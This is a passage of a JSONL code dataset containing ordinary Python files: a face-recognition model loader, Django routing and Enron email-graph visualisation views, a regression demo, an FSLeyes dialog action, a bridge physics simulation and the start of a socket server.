print(row)\nconn.commit()\nconn.close()\n","sub_path":"1.sqlite/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"278177041","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom scipy import misc\nimport sys\nimport os\nimport pickle\nimport argparse\n#import tensorflow as tf\nimport numpy as np\nimport mxnet as mx\nimport random\nimport cv2\nimport sklearn\nfrom sklearn.decomposition import PCA\nfrom time import sleep\nfrom easydict import EasyDict as edict\n# sys.path.append(os.path.join(os.path.dirname(__file__), 'src'))\nfrom mtcnn_detector import MtcnnDetector\nimport face_image\nimport face_preprocess\n\n\n\ndef do_flip(data):\n for idx in range(data.shape[0]):\n data[idx,:,:] = np.fliplr(data[idx,:,:])\n\ndef get_model(ctx, image_size, model_str, layer):\n _vec = model_str.split(',')\n assert len(_vec)==2\n prefix = _vec[0]\n epoch = int(_vec[1])\n print('---------*** Model loading ***-----------')\n # sym, arg_params, aux_params = mx.model.load_checkpoint(prefix, epoch)\n model_path=os.path.join(os.path.dirname(__file__), '..', 'model')\n # # transform model to npy\n print(model_path)\n with open(os.path.join(model_path,'sym.pkl'), 'rb') as a_: # open file with write-mode\n # picklestring = pickle.dump(sym, a_)\n sym=pickle.load(a_)\n with open(os.path.join(model_path,'arg_params.pkl'), 'rb') as b_: # open file with write-mode\n # picklestring = pickle.dump(arg_params, b_)\n arg_params=pickle.load(b_)\n with open(os.path.join(model_path,'aux_params.pkl'), 'rb') as c_: # open file with write-mode\n # picklestring = pickle.dump(aux_params, c_)\n aux_params=pickle.load(c_)\n #end\n\n all_layers = sym.get_internals()\n sym = all_layers[layer+'_output']\n # print('sym',type(sym))\n # print('arg_params',type(arg_params))\n # print('aux_params',type(aux_params))\n model = mx.mod.Module(symbol=sym, context=ctx, label_names = None)\n #model.bind(data_shapes=[('data', (args.batch_size, 3, image_size[0], image_size[1]))], label_shapes=[('softmax_label', (args.batch_size,))])\n # print(image_size[0])\n model.bind(data_shapes=[('data', (1, 3, image_size[0], image_size[1]))])\n # print(arg_params,aux_params)\n model.set_params(arg_params, aux_params)\n return model\n\nclass FaceModel:\n def __init__(self, args):\n self.args = args\n ctx = mx.gpu(args.gpu)\n _vec = args.image_size.split(',')\n assert len(_vec)==2\n image_size = (int(_vec[0]), int(_vec[1]))\n self.model = None\n self.ga_model = None\n if len(args.model)>0:\n self.model = get_model(ctx, image_size, args.model, 'fc1')\n if len(args.ga_model)>0:\n self.ga_model = get_model(ctx, image_size, args.ga_model, 'fc1')\n\n # self.threshold = args.threshold\n self.det_minsize = 50\n self.det_threshold = [0.6,0.7,0.8]\n #self.det_factor = 0.9\n self.image_size = image_size\n mtcnn_path = os.path.join(os.path.dirname(__file__), '..','mtcnn-model')\n if args.det==0:\n # detector = MtcnnDetector(model_folder=mtcnn_path, ctx=ctx, num_worker=1, accurate_landmark = True, threshold=self.det_threshold)\n with open(os.path.join(mtcnn_path,'mtcnn_0.pkl'), 'rb') as d_: # open file with write-mode\n # picklestring = pickle.dump(detector, d_)\n detector=pickle.load(d_)\n else:\n # detector = MtcnnDetector(model_folder=mtcnn_path, ctx=ctx, num_worker=1, accurate_landmark = True, threshold=[0.0,0.0,0.2])\n with open(os.path.join(mtcnn_path,'mtcnn_1.pkl'), 'rb') as e_: # open file with write-mode\n # picklestring = pickle.dump(detector, e_)\n detector=pickle.load(e_)\n self.detector = detector\n\n\n def get_input(self, face_img):\n ret = self.detector.detect_face(face_img, det_type = self.args.det)\n if ret is None:\n return None\n bbox, points = ret\n if bbox.shape[0]==0:\n return None\n bbox = bbox[0,0:4]\n points = points[0,:].reshape((2,5)).T\n # print('bbox',bbox)\n # print('points',points)\n nimg = face_preprocess.preprocess(face_img, bbox, points, image_size='112,112')\n nimg = cv2.cvtColor(nimg, cv2.COLOR_BGR2RGB)\n aligned = np.transpose(nimg, (2,0,1))\n return aligned\n\n def get_feature(self, aligned):\n input_blob = np.expand_dims(aligned, axis=0)\n data = mx.nd.array(input_blob)\n db = mx.io.DataBatch(data=(data,))\n self.model.forward(db, is_train=False)\n embedding = self.model.get_outputs()[0].asnumpy()\n embedding = sklearn.preprocessing.normalize(embedding).flatten()\n return embedding\n\n def get_ga(self, aligned):\n input_blob = np.expand_dims(aligned, axis=0)\n data = mx.nd.array(input_blob)\n db = mx.io.DataBatch(data=(data,))\n self.ga_model.forward(db, is_train=False)\n ret = self.ga_model.get_outputs()[0].asnumpy()\n g = ret[:,0:2].flatten()\n gender = np.argmax(g)\n a = ret[:,2:202].reshape( (100,2) )\n a = np.argmax(a, axis=1)\n age = int(sum(a))\n\n return gender, age\n\n","sub_path":"src/pickle_face_model.py","file_name":"pickle_face_model.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"343883688","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.contrib.sitemaps import views\nfrom django.views.generic import TemplateView\n\nfrom questions.views import QuestionFeedView, QuestionDetailView\nfrom questions.sitemaps import StaticViewSitemap, QuestionSitemap\n\n\nsitemaps = {\n 'static': StaticViewSitemap(),\n 'question': QuestionSitemap()\n}\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^comments/', include('django_comments.urls')),\n url('^', include('django.contrib.auth.urls')),\n url(r'^accounts/', include('accounts.urls')),\n url(r'^$', QuestionFeedView.as_view(), name='questions'),\n url(r'^question/(?P\\d+)/$',\n QuestionDetailView.as_view(),\n name='detail_question'),\n url(r'^new/$', TemplateView.as_view(\n template_name=\"questions/new_question.html\"),\n name='new_question'),\n url(r'^chat/$', TemplateView.as_view(\n template_name=\"questions/chat.html\"),\n name='chat'),\n url(r'^telefon/$', TemplateView.as_view(\n template_name=\"questions/telefon.html\"),\n name='telefon'),\n url(r'^forma/$', TemplateView.as_view(\n template_name=\"questions/forma_pr.html\"),\n name='forma'),\n url(r'^sitemap-(?P
.+)\\.xml$', views.sitemap, {'sitemaps': sitemaps},\n name='django.contrib.sitemaps.views.sitemap'),\n url(r'^sitemap\\.xml$', views.index, {'sitemaps': sitemaps}),\n url(r'^robots.txt$', TemplateView.as_view(\n template_name='questions/robots.txt',\n content_type='text/plain'),)\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls)),\n ] + urlpatterns\n","sub_path":"urist/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"182362048","text":"import random\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn import datasets, linear_model\r\nfrom sklearn.metrics import mean_squared_error, r2_score\r\nfrom matplotlib.font_manager import FontProperties\r\nfont = FontProperties(fname=r\"c:\\windows\\fonts\\msyh.ttc\", size=15)\r\nlist=[]\r\nlist2=[]\r\nfor i in range(60):\r\n list.append([i])\r\nfor i in range(60):\r\n list2.append([2*i+random.randint(-10,10)])\r\nx=tuple(list)\r\ny=tuple(list2)\r\ngreat = linear_model.LinearRegression()#引入线性回归模型\r\ngreat.fit(x,y)#将输入进来的数字转换为矩阵模式\r\n#现在我们开始用plot画出线性方程,计算出0处以及我们的最大值点出预测出来的y的大小\r\n\r\nplt.scatter(x,y)\r\nplt.title(\"机器学习之:线性回归\\n制作人:宋谨岑\",fontproperties=font)\r\nplt.plot([0,60],[1.73825137,great.predict(60)],linewidth=3,color=\"black\")\r\nplt.show()\r\nprint(great.predict(0))\r\nprint(great.predict(60))\r\nprint(great.predict(60))#这里输入的是x,这样就会将矩阵模式线性回归出y的值的大小\r\n#predict仅仅对我们的已经应用fit方法转换过的矩阵模式有效.\r\n","sub_path":"高考完后写的Python代码/线性回归.py","file_name":"线性回归.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"495972588","text":"\n########Backend Utility Libs#####\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.http import HttpResponse\n\nimport django.http\nimport json\n################################\n\n########Data Science and Graph libs######\nimport pandas as pd\nimport networkx\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n########Normal Graph############\nfrom bokeh.models import Range1d, Circle, ColumnDataSource, MultiLine\nfrom bokeh.plotting import figure\nfrom bokeh.models.graphs import from_networkx\nfrom bokeh.palettes import Category10\nfrom bokeh.transform import linear_cmap\nfrom bokeh.embed import json_item\n\n\n############Chord################\nimport numpy as np\n \nfrom chord import Chord\n########################################\n\n\n\n\n############Filtering###############\ndef filterDataByTime(request, data):\n startDate = request.POST.get(\"start_date\", '0000-00-00')\n endDate = request.POST.get(\"end_date\", '9999-99-99')\n return data[ ((data[\"date\"]>=startDate) & (data[\"date\"] <= endDate)) ]\n\ndef filterDataByJobtitle(request, data):\n if not 'job_titles' in request.POST: return data\n\n fromMask = data[\"fromJobtitle\"] == '___'\n toMask = data[\"toJobtitle\"] == '___'\n\n for i in request.POST.get(\"job_titles\").split(','):\n fromMask |= (data[\"fromJobtitle\"] == i)\n toMask |= (data[\"toJobtitle\"] == i)\n\n return data[(fromMask & toMask)]\n\ndef filterDataBySentiment(request,data):\n mask = data[\"sentiment\"] == 10\n filterSelected = False\n if 'sentiment_negative' in request.POST:\n mask |= (data[\"sentiment\"] <= -0.1)\n filterSelected = True\n if 'sentiment_neutral' in request.POST:\n mask |= ((data[\"sentiment\"] >= -0.1) & (data[\"sentiment\"] <= 0.1))\n filterSelected = True\n if 'sentiment_positive' in request.POST:\n mask |= (data[\"sentiment\"] >= 0.1)\n filterSelected = True\n if (filterSelected):\n print(len(data))\n print(len(data[mask]))\n return data[mask]\n return data\n\ndef filterDataByPerson(request,data): #used for other purposes not necessarily in filtering\n personID = request.POST.get(\"personID\")\n return data[ ( (data[\"fromId\"] == personID) | (data[\"toId\"] == personID) ) ]\n\ndef filterDataByEmailAddress(request,data):\n email = request.POST.get(\"email\")\n return data[ ( (data[\"fromEmail\"] == email) | (data[\"toEmail\"] == email) ) ]\n\n\"\"\"\ndef filter(request,data): #full filtering\n data = filterDataByTime(request, data)\n data = filterDataByJobtitle(request, data)\n data = filterDataBySentiment(request, data)\n data = filterDataByEmailAddress(request, data)\n # compound with more filtering options\n \n return data \n\"\"\"\n\ndef filter(request,data): #full filtering\n finalData = filterDataByTime(request, data)\n finalData = filterDataByJobtitle(request, finalData)\n finalData = filterDataBySentiment(request, finalData)\n #return filterDataByJobtitles(request, finalData) \n return finalData\n\n################################################################\n\ndef index(request):\n return render(request, 'index.html')\n\ndef makeGraph(request, df_enron):\n G = networkx.from_pandas_edgelist(df_enron, 'fromId', 'toId', edge_attr=True)\n\n di = {'CEO':1,'Director':2,'Employee':3,'In House Lawyer':4,'Manager':5,'Managing Director':6,'President':7,'Trader':8,'Unknown':9,'Vice President':10}\n df_rejob = df_enron.replace({\"fromJobtitle\": di})\n df_attributes = df_enron[['fromId', 'fromJobtitle', 'fromEmail']].drop_duplicates()\n df_attributes.columns = ['fromId', 'job', 'fromEmail']\n df_attributesx = df_rejob[['fromId', 'fromJobtitle', 'fromEmail']].drop_duplicates()\n job = df_attributes.set_index('fromId').to_dict('i')\n jobx = df_attributesx.set_index('fromId').to_dict('i')\n fromEmail = df_attributes.set_index('fromEmail').to_dict('i')\n networkx.set_node_attributes(G, job)\n networkx.set_node_attributes(G, jobx)\n networkx.set_node_attributes(G, fromEmail)\n #jobs = ['Employee','Vice President','Unknown','Manager','CEO','Trader','Director','President','Managing Director','In House Lawyer']\n\n degrees = dict(networkx.degree(G))\n networkx.set_node_attributes(G, name='degree', values=degrees)\n adjusted_node_size = dict([(node, (degree + 5) - ((degree + 5)*0.3) ) for node, degree in networkx.degree(G)])\n networkx.set_node_attributes(G, name='adjusted_node_size', values=adjusted_node_size)\n\n size_by_this_attribute = 'adjusted_node_size'\n color_by_this_attribute = 'fromJobtitle'\n\n color_palette = Category10[10]\n\n TOOLTIPS = [\n (\"Person ID\", \"@index\"),\n (\"Email\", \"@fromEmail\"),\n (\"people communicated with\", \"@degree\"),\n (\"Jobtitle\",\"@job\"),\n ]\n\n graph_size = int(request.POST.get('graph_size', '720'))\n plot = figure(tooltips = TOOLTIPS,\n tools=\"pan,zoom_in,wheel_zoom,save,reset,box_select,undo\", active_scroll='wheel_zoom',\n x_range=Range1d(-20,20), y_range=Range1d(-20,20), title='Enron Emails',\n plot_width=graph_size, plot_height=graph_size)\n plot.axis.visible = False\n\n N_graph = from_networkx(G, networkx.spring_layout, scale=100)\n\n N_graph.node_renderer.glyph = Circle(size=size_by_this_attribute,\n fill_color=linear_cmap(color_by_this_attribute, color_palette, 1, 10))\n\n N_graph.edge_renderer.glyph = MultiLine(line_alpha=10, line_width=1)\n\n plot.renderers.append(N_graph)\n\n item_text = json.dumps(json_item(plot))\n\n return item_text\n # import holoviews as hv\n # from holoviews import opts, dim\n # import networkx as nx\n # import dask.dataframe as dd\n # from holoviews.selection import link_selections\n # from holoviews.operation.datashader import (\n # datashade, dynspread, directly_connect_edges, bundle_graph, stack\n # )\n # from holoviews.element.graphs import layout_nodes\n # from datashader.layout import random_layout\n # from colorcet import fire\n # import pandas as pd\n # import networkx\n # import matplotlib.pyplot as plt\n # import numpy as np\n # from bokeh.plotting import figure\n # from bokeh.resources import CDN\n # from bokeh.embed import file_html\n\n # hv.extension('bokeh')\n # df_chord = df_enron.sort_values('fromJobtitle')\n # df_chord['index'] = df_chord.index\n # df_links = df_chord.groupby(['fromId', 'toId']).count()\n # df_links = df_links.reset_index()[['fromId','toId', 'date']]\n # df_links.columns = ['source', 'target', 'value']\n # x = df_chord[['fromId', 'fromJobtitle']].drop_duplicates()\n # x.columns = ['source', 'fromJobtitle']\n\n # df_links = pd.merge(df_links, x, on=\"source\")\n # df_nodes = df_chord[['fromId','fromEmail', 'fromJobtitle']].drop_duplicates().reset_index(drop=True)\n # df_nodes.columns = ['index', 'name', 'group']\n # df_nodes.sort_values('name')\n # y = df_chord[['fromId', 'toId']].drop_duplicates().groupby(['fromId']).count().reset_index()\n # y.columns = ['index', 'sizeOut']\n # y['sizeIn'] = df_chord[['fromId', 'toId']].drop_duplicates().groupby(['toId']).count().reset_index()[['fromId']]\n # y['size'] = y['sizeIn'] + y['sizeOut']\n # df_nodes = pd.merge(df_nodes, y, on='index')\n # df_nodes['size2'] = df_nodes['size']/3+8\n # from bokeh.models import Circle\n\n # nodes = hv.Dataset(df_nodes, 'index')\n # edge_df = df_links\n\n # eb_graph = hv.Graph((edge_df, nodes))\n\n # T_graph = layout_nodes(eb_graph, layout=nx.spring_layout)\n # #B_graph_3 = bundle_graph(T_graph)\n # from bokeh.models import HoverTool\n # TOOLTIPS = [\n # (\"Person ID\", \"@index\"),\n # (\"people communicated with\", \"@size\"),\n # (\"Jobtitle\",\"@group\"),\n # ]\n # hover = HoverTool(tooltips=TOOLTIPS)\n # graph_size = int(request.POST.get('graph_size', '720'))\n # #B_graph_3.options(node_color='group', cmap='Category20', node_size='size2', show_legend=True, tools=[hover],frame_width=graph_size, frame_height=graph_size)\n # T_graph.options(node_color='group', cmap='Category20', node_size='size2', show_legend=True, tools=[hover],frame_width=graph_size, frame_height=graph_size)\n\n # # # json_graph = json_item(B_graph_3)\n\n # # json_graph = json_item(T_graph)\n # # item_text = json.dumps(json_graph)\n\n # # return item_text\n\n # renderer = hv.renderer('bokeh')\n # plot = renderer.get_plot(T_graph)\n\n # return file_html(plot, CDN, \"Plot\")\n\ndef fullSizeGraph(request):\n \n graph_json = makeGraph(request, filter(request,pd.read_csv(request.FILES['csv_data'])))\n # return django.http.JsonResponse(graph_json, safe=False)\n return JsonResponse({\n 'graph': graph_json\n })\n\ndef initialFullSizeGraph(request):\n \n df_dataset = pd.read_csv(request.FILES['csv_data'])\n \n startDate = df_dataset[\"date\"].min()\n endDate = df_dataset[\"date\"].max()\n\n startYear = int(startDate[:4])\n endYear = int(endDate[:4])\n\n startMonth = int(startDate[5:7])\n endMonth = int(startDate[5:7])\n\n jobTitles = df_dataset.fromJobtitle.unique().tolist()\n\n graph_json = makeGraph(request, df_dataset)\n\n return JsonResponse({\n 'graph': graph_json,\n 'parameters': {\n 'timeSlider': {\n 'startYear': startYear,\n 'startMonth': startMonth,\n 'endYear': endYear,\n 'endMonth': endMonth\n },\n 'jobTitles': jobTitles\n }\n })\n\ndef chordDiagram(person_id, df_enron):\n import holoviews as hv\n from holoviews import opts\n from bokeh.resources import CDN\n from bokeh.embed import file_html\n\n hv.extension('bokeh')\n\n df_chord = df_enron.sort_values('fromJobtitle')\n df_chord['index'] = df_chord.index\n\n df_links = df_chord.groupby(['fromId', 'toId']).agg({'date':'count', 'sentiment':'mean'})\n df_links = df_links.reset_index()[['fromId','toId', 'date', 'sentiment']]\n df_links.columns = ['source', 'target', 'value', 'sentiment']\n\n x = df_chord[['fromId', 'fromJobtitle']].drop_duplicates()\n x.columns = ['source', 'fromJobtitle']\n\n df_links = pd.merge(df_links, x, on=\"source\")\n df_links.drop_duplicates(subset='source')\n\n df_nodes = df_chord[['fromId','fromEmail', 'fromJobtitle']].drop_duplicates().reset_index(drop=True)\n df_nodes.columns = ['index', 'name', 'group']\n df_nodes.sort_values('name')\n y = df_chord[['fromId', 'toId']].drop_duplicates().groupby(['fromId']).count().reset_index()\n y.columns = ['index', 'size']\n df_nodes = pd.merge(df_nodes, y, on='index')\n df_nodes['size'] = df_nodes['size']/3+8\n\n nodes = hv.Dataset(df_nodes, 'index')\n edge_df = df_links\n\n import seaborn as sns # also improves the look of plots\n sns.set() # set Seaborn defaults\n\n chord = hv.Chord((df_links, nodes)).select(value=(5, None))\n chord.opts(\n opts.Chord(cmap='Category20', edge_cmap='Category20', edge_color='sentiment', \n labels='name', node_color='group', edge_alpha=0.8, edge_line_width=1.5))\n\n final_chord = chord.select(index=person_id)\n\n plot = hv.render(final_chord, backend='bokeh')\n item_text = json.dumps(json_item(plot))\n return item_text\n\n # renderer = hv.renderer('bokeh')\n # plot = renderer.get_plot(final_chord).state\n # return file_html(plot, CDN, \"Plot\")\n\ndef individualInfo(request):\n\n # import matplotlib.pyplot as plt\n\n # plt.rcParams['figure.figsize'] = [10, 5] # default hor./vert. size of plots, in inches\n # plt.rcParams['lines.markeredgewidth'] = 1 # to fix issue with seaborn box plots; needed after import seaborn\n\n # # reveal a hint only while holding the mouse down\n # from IPython.display import HTML\n # HTML(\"\")\n\n # # hide FutureWarnings, which may show for Seaborn calls in most recent Anaconda\n # import warnings\n # warnings.filterwarnings(\"ignore\", category=FutureWarning)\n\n person_id = int(request.POST['person_id'])\n\n df_enron = pd.read_csv(request.FILES['csv_data'])\n Person_ID_1, ID_mail, job_title, mails_send, mean_sentiment_send, min_sentiment_send, max_sentiment_send, mails_received, mean_sentiment_received, min_sentiment_received, max_sentiment_received, array_mails_sent, array_mails_received, p_most_received_emails, most_received_emails_nr, p_most_sent_emails, most_sent_emails_nr = getIndividualInfoInner(df_enron, person_id)\n \n df_enron_tf = filter(request,df_enron)\n Person_ID_1_tf, ID_mail_tf, job_title_tf, mails_send_tf, mean_sentiment_send_tf, min_sentiment_send_tf, max_sentiment_send_tf, mails_received_tf, mean_sentiment_received_tf, min_sentiment_received_tf, max_sentiment_received_tf, array_mails_sent_tf, array_mails_received_tf, p_most_received_emails_tf, most_received_emails_nr_tf, p_most_sent_emails_tf, most_sent_emails_nr_tf = getIndividualInfoInner(df_enron_tf, person_id)\n\n chord = chordDiagram(person_id, df_enron)\n\n #Person_ID_1, ID_mail, job_title, mails_send, mean_sentiment_send, min_sentiment_send, max_sentiment_send, mails_received, mean_sentiment_received, min_sentiment_received, max_sentiment_received\n return JsonResponse({\n 'meta': {\n 'person_id': str(Person_ID_1),\n 'mail_address': str(ID_mail),\n 'job_title': str(job_title),\n },\n 'all_time': {\n 'mails_sent': str(mails_send),\n 'min_sentiment_sent': str(min_sentiment_send),\n 'mean_sentiment_sent': str(mean_sentiment_send),\n 'max_sentiment_sent': str(max_sentiment_send),\n 'array_mails_sent': array_mails_sent,\n 'mails_received': str(mails_received),\n 'min_sentiment_received': str(min_sentiment_received),\n 'mean_sentiment_received': str(mean_sentiment_received),\n 'max_sentiment_received': str(max_sentiment_received),\n 'array_mails_received': array_mails_received,\n 'person_most_emails_received' : str(p_most_received_emails),\n 'number_received' : str(most_received_emails_nr),\n 'person_most_emails_sent' : str(p_most_sent_emails),\n 'number_sent' : str(most_sent_emails_nr),\n\n },\n 'time_filtered': {\n 'mails_sent': str(mails_send_tf),\n 'min_sentiment_sent': str(min_sentiment_send_tf),\n 'mean_sentiment_sent': str(mean_sentiment_send_tf),\n 'max_sentiment_sent': str(max_sentiment_send_tf),\n 'array_mails_sent': array_mails_sent_tf,\n 'mails_received': str(mails_received_tf),\n 'min_sentiment_received': str(min_sentiment_received_tf),\n 'mean_sentiment_received': str(mean_sentiment_received_tf),\n 'max_sentiment_received': str(max_sentiment_received_tf),\n 'array_mails_received': array_mails_received_tf,\n 'person_most_emails_received' : str(p_most_received_emails_tf),\n 'number_received' : str(most_received_emails_nr_tf),\n 'person_most_emails_sent' : str(p_most_sent_emails_tf),\n 'number_sent' : str(most_sent_emails_nr_tf),\n },\n 'chord': chord\n })\n\ndef getIndividualInfoInner(df_enron, person_id):\n person_send = df_enron['fromId'] == person_id\n person_received = df_enron['toId'] == person_id\n df_1 = df_enron[person_send]\n df_2 = df_1[['fromEmail']]\n df_3 = df_2.describe()\n ID_mail = df_3['fromEmail']['top']\n df_describe_person = df_1[['fromJobtitle']].describe()\n job_title = df_describe_person['fromJobtitle']['top']\n mails_send = df_1['sentiment'].count()\n mean_sentiment_send = df_1['sentiment'].mean()\n min_sentiment_send = df_1['sentiment'].min()\n max_sentiment_send = df_1['sentiment'].max()\n df_received = df_enron[person_received]\n mails_received = df_received['sentiment'].count()\n mean_sentiment_received = df_received['sentiment'].mean()\n min_sentiment_received = df_received['sentiment'].min()\n max_sentiment_received = df_received['sentiment'].max()\n emails_sent = 'none'\n\n\n \n\n df_person = df_enron[person_send | person_received]\n person = df_person.groupby([\"fromId\"])[[\"fromEmail\"]].count().sort_values(by = \"fromEmail\", ascending = False).iloc[[0]]\n\n person_with_most_received_emails = person.index.values[0]\n nr_received_emails = person.values[0][0]\n\n person = df_person.groupby([\"toId\"])[[\"toEmail\"]].count().sort_values(by = \"toEmail\", ascending = False).iloc[[0]]\n\n person_with_most_sent_emails = person.index.values[0]\n nr_sent_emails = person.values[0][0]\n\n try:\n df_emails_sent_1 = df_1.groupby('toId').describe()\n df_emails_sent_2 = df_emails_sent_1['fromId']\n emails_sent = df_emails_sent_2[['count']].to_json()\n except:\n pass\n emails_received = 'none'\n try:\n emails_received_1 = df_received.groupby('fromId').describe()\n emails_received_2 = emails_received_1['toId']\n emails_received = emails_received_2[['count']].to_json()\n except:\n pass\n return person_id, ID_mail, job_title, mails_send, mean_sentiment_send, min_sentiment_send, max_sentiment_send, mails_received, mean_sentiment_received, min_sentiment_received, max_sentiment_received, emails_sent, emails_received, person_with_most_received_emails, nr_received_emails, person_with_most_sent_emails, nr_sent_emails\n #from bokeh.io import output_notebook, show, save\n","sub_path":".history/backend/views_20210626185437.py","file_name":"views_20210626185437.py","file_ext":"py","file_size_in_byte":17445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"488334820","text":"#!/usr/bin/env python\n#\n# saveperspective.py - The SavePerspectiveAction\n#\n# Author: Paul McCarthy \n#\n\"\"\"This module provides the :class:`SavePerspectiveAction` class, an action\nwhich allows the user to save the current perspective.\n\"\"\"\n\n\nimport fsleyes.strings as strings\nimport fsleyes.perspectives as perspectives\nfrom . import base\n\n\nclass SavePerspectiveAction(base.Action):\n \"\"\"The ``SavePerspectiveAction`` allows the user to save the current\n :class:`.FSLeyesFrame` layout as a perspective, so it can be restored\n at a later time. See the :mod:`.perspectives` module.\n \"\"\"\n\n def __init__(self, frame):\n \"\"\"Create a ``SavePerspectiveAction``.\n\n :arg frame: The :class:`.FSLeyesFrame`.\n \"\"\"\n\n self.__frame = frame\n\n base.Action.__init__(self, self.__savePerspective)\n\n\n def __savePerspective(self):\n \"\"\"Save the current :class:`.FSLeyesFrame` layout as a perspective.\n The user is prompted to enter a name, and the current frame layout\n is saved via the :func:`.perspectives.savePerspective` function.\n \"\"\"\n\n import wx\n\n builtIns = list(perspectives.BUILT_IN_PERSPECTIVES.keys())\n saved = perspectives.getAllPerspectives()\n\n while True:\n dlg = wx.TextEntryDialog(\n self.__frame,\n message=strings.messages[self, 'enterName'])\n\n if dlg.ShowModal() != wx.ID_OK:\n return\n\n name = dlg.GetValue()\n\n if name.strip() == '':\n return\n\n # Not allowed to use built-in perspective names\n if name in builtIns:\n dlg = wx.MessageDialog(\n self.__frame,\n message=strings.messages[\n self, 'nameIsBuiltIn'].format(name),\n style=(wx.ICON_EXCLAMATION | wx.OK))\n dlg.ShowModal()\n continue\n\n # Name collision - confirm overwrite\n if name in saved:\n dlg = wx.MessageDialog(\n self.__frame,\n message=strings.messages[\n self, 'confirmOverwrite'].format(name),\n style=(wx.ICON_QUESTION | wx.YES_NO | wx.NO_DEFAULT))\n\n if dlg.ShowModal() == wx.ID_NO:\n continue\n\n break\n\n perspectives.savePerspective(self.__frame, name)\n\n self.__frame.refreshPerspectiveMenu()\n","sub_path":"fsleyes/actions/saveperspective.py","file_name":"saveperspective.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"643828540","text":"from abc import ABC, abstractmethod\r\nimport numpy as np\r\nfrom numpy import sin, cos, pi\r\n\r\ng = 9.81\r\n\r\n\r\nclass Bridge:\r\n def __init__(self, length, moment):\r\n self.length = length\r\n self.moment = moment\r\n self.angle = 0\r\n self.vel = 0\r\n self.acc = 0\r\n self.fulcrum = np.array([0, 0])\r\n self.bots = []\r\n self.tipped = False\r\n\r\n def add_robot(self, robot):\r\n self.bots.append(robot)\r\n\r\n def next_frame(self, delta_time=0.05):\r\n last_acc = self.acc\r\n last_vel = self.vel\r\n last_angle = self.angle\r\n\r\n total_torque = 0\r\n total_inertia = self.moment\r\n for i in self.bots:\r\n i.update(self.angle, self.vel, delta_time=delta_time)\r\n if abs(i.pos) < abs(self.length / 2):\r\n torque = g*i.mass*i.pos*cos(self.angle)\r\n total_torque += torque\r\n inertia = i.mass*i.pos**2\r\n total_inertia += inertia\r\n\r\n self.acc = total_torque / total_inertia\r\n self.vel = self.acc*delta_time+last_vel\r\n self.angle = .5*(self.vel+last_vel)*delta_time+last_angle\r\n\r\n if abs(self.angle) > pi/2:\r\n self.tipped = True\r\n\r\n def sim_time(self, time, delta_time=0.05):\r\n t = []\r\n ang = []\r\n vel = []\r\n acc = []\r\n pos = []\r\n pos2 = []\r\n rvel = []\r\n for i in np.arange(0, time, delta_time):\r\n if not self.tipped:\r\n self.next_frame(delta_time)\r\n t.append(i)\r\n ang.append(self.angle)\r\n vel.append(self.vel)\r\n acc.append(self.acc)\r\n pos.append(self.bots[0].pos)\r\n pos2.append(self.bots[1].pos)\r\n rvel.append(self.bots[0].vel)\r\n # print(i, self.angle, self.vel, self.acc, self.bots[0].pos, sep='\\t')\r\n\r\n return t, ang, vel, acc, pos, pos2\r\n\r\n def get_bots(self):\r\n pos = []\r\n vel = []\r\n\r\n for i in self.bots:\r\n pos.append(i.pos)\r\n vel.append(i.vel)\r\n\r\n return pos, vel\r\n\r\n\r\nclass Robot(ABC):\r\n def __init__(self, mass, pos, vel, acc):\r\n \"\"\"\r\n Dynamic Load for the bridge\r\n :param mass: Mass (kg)\r\n :param pos: Origin is at fulcrum, right is positive (m)\r\n :param vel: Field oriented velocity (m/s)\r\n :param acc: Field oriented acceleration (m/s^2)\r\n :param friction: Coefficient of kinetic friction\r\n \"\"\"\r\n self.mass = mass\r\n self.pos = pos\r\n self.vel = vel\r\n self.acc = acc\r\n\r\n def step_vel(self, new_vel, delta_time=0.05):\r\n last_vel = self.vel\r\n self.vel = new_vel\r\n self.pos += .5*(self.vel+last_vel)*delta_time\r\n\r\n def step_acc(self, new_acc, delta_time=0.05):\r\n self.acc = new_acc\r\n new_vel = self.vel + self.acc*delta_time\r\n self.step_vel(new_vel, delta_time=delta_time)\r\n\r\n @abstractmethod\r\n def update(self, angle, vel, delta_time=.05):\r\n pass\r\n","sub_path":"src/antares/labyrinth/simulation/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"119846785","text":"import socket\nimport threading\nimport threaded\n\nHOST = socket.gethostbyname(socket.gethostname())\nPORT = 4000\n\n# \"with\" look like \"try-finally\"\n# socket(ADDRESS_FAMILY, SOCKET_TYPE)\n# ADRESS_FAMILY -> AF_NET (default): IPV4\n# -> AF_INET6: IPV6\n# SOCKET_TYPE -> SOCK_STREAM (default): TCP \n# -> SOCK_DGRAM: UDP\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tcp:\n # used for defining the communication end point (socket), associating the socket with a address\n # bind(ADDRESS_FAMILY(AF_NET), Port)\n # socket.gethostname() returns the hostname's machine\n\n print(f'Try to connect: {HOST}:{PORT}')\n\n tcp.bind((HOST, PORT))\n\n # define the number of pending connections the queue will hold\n # listen(BACKLOG)\n # socket.SOMAXCONN is the 